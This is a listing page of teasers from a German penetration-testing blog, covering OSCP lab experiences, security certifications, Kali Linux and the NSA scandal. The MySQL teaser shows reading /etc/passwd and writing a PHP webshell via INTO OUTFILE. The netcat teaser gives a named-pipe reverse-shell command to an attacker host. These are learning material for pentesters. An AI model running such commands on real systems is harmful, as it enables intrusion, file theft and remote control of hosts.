Author: Patrick Sauer

Bachelor IT-Sicherheit der Hochschule Albstadt-Sigmaringen – sinnvoll?

1 Comment

Von der Hochschule Albstadt-Sigmaringen wird ab dem Wintersemester 2014/2015 ein Bachelor in IT-Sicherheit angeboten. Inhalte sollen u.a. Kryptologie, digitale Forensik, offensive Sicherheitsmethoden sowie Security Management sein. Nachdem ein Bachelor eigentlich ein erster berufsqualifizierender Abschluss sein soll, bin ich bei diesem Studiengang ersteimal skeptisch, ob das wirklich funktioniert. Ich halte ein richtiges Informatikstudium mit einer späteren … [Read more…]

Erfahrungen zum OSCP: Teil 6 Manchmal kann es so simpel sein

Leave a Comment

Manchmal kann es so simpel sein. Ich hatte auf einem Linux-Host eine nicht-privilegierte Reverse-Shell per netcat erlangt. Neben root existierte noch ein weiterer User. Nachdem ich mehrere Stunden erfolglos Zeit in die Privilege Escalation über Exploits investiert hatte, war ich kurz vorm Aufgeben für diesen Tag. Aus purer Verzweiflung wagte ich ein „su username“ und … [Read more…]

Berufszertifikate für IT-Security-Professionals: Welches ist empfehlenswert?

Leave a Comment

Es sind einige Berufszertifikate für IT-Security-Professionals auf dem Markt, mit jeweils unterschiedlichen Schwerpunkten. Ich selbst halte zurzeit u.a. CISSP, CISM und T.I.S.P. und kann insbesondere den CISSP empfehlen. Er ist wesentlich breiter aufgestellt als der CISM und international wesentlich besser anerkannt als der TISP. Wer einen etwas größeren Fokus auf Deutschland besitzt, für den ist … [Read more…]

Hacking MySQL: MySQL-Server als root

Leave a Comment

Dienste unnötigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders dämlich ist sie bei MySQL. Über LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische Möglichkeiten zur Verfügung, die sich auch problemlos über SQL Injections nutzen lassen: SELECT LOAD_FILE(„/etc/passwd“); SELECT ‚<?php system($_REQUEST[‚cmd‘]); ?>‘ INTO OUTFILE ‚/var/www/webshell.php … [Read more…]

Unprivilegierter User-Account in Kali Linux

Leave a Comment

So direkt kann ich nicht nachvollziehen, warum Backtrack bzw. jetzt Kali Linux ihre Penetration Tester konsequent als root arbeiten lassen. Ein unprivilegierter User-Account und die Nutzung von sudo wären meiner Ansicht nach die bessere Wahl. Man benutzt schließlich als Sicherheitsspezialist eine Linux-Distribution, die genauso angegriffen werden kann wie man selbst Systeme angreift. Einen lokalen Nutzer … [Read more…]

Remote-Shell mit Netcat ohne „-e“ exec

Leave a Comment

Manch ein netcat unterstützt nicht die Option -e, sodass eine Remote-Shell über „-e /bin/bash“ nicht funktioniert. Die Abhilfe: kali# nc -nvlp 4444 host# mknod /tmp/pipe p host# /bin/sh 0</tmp/pipe | nc kali 4444 1>/tmp/pipe Eine Named Pipe erstellen. Die Named Pipe zur Eingabe der Shell lenken, die Ausgabe der Shell nach netcat pipen und die … [Read more…]

Erfahrungen zum OSCP: Teil 5 Es zieht sich.

Leave a Comment

Mein aktueller Stand: 5x privilegierte Rechte 6x unprivilegierte Rechte Freischaltung DEV- und IT-Netz Es zieht sich etwas. Das Labor ist enorm groß. Manchmal hat man eine gute Idee und ein wenig Glück, sodass eine Maschine schnell gerootet ist. Dafür rennt man bei anderen Maschinen Angriffsvektoren hinterher, die nicht zu funktionieren scheinen. Es fühlt sich ein … [Read more…]

Der jährliche Preis von CISSP und CISM im Vergleich

Leave a Comment

Ich habe heute die jährlichen Gebühren für den CISSP von Isc² und für den CISM von ISACA beglichen. Zum Erhalt der Zertifizierung reicht dies natürlich nicht, da noch der Nachweis von jährlichen CPEs (Continuous Professional Education) zu erbringen ist. Unabhängig davon möchte der Isc² für den CISSP $85 Maintenance Fee. Das kann man nun als … [Read more…]

Der NSA-Skandal als Security Awareness-Kampagne

Leave a Comment

Vielen Dank liebe NSA für diese herausragende Security Awareness-Kampagne in der deutschen Bevölkerung. Erst am Anfang einmal starke Aufmerksamkeit erwecken, dass unverschlüsselte Kommunikation abgehört werden kann. Korrektur, wird. Die meisten Deutschen wissen nun, dass die NSA durch PRISM mitlesen kann, wenn sie möchte. So arbeitet man klar heraus, warum man z.B. bei vertraulicher Kommunikation Verschlüsselung … [Read more…]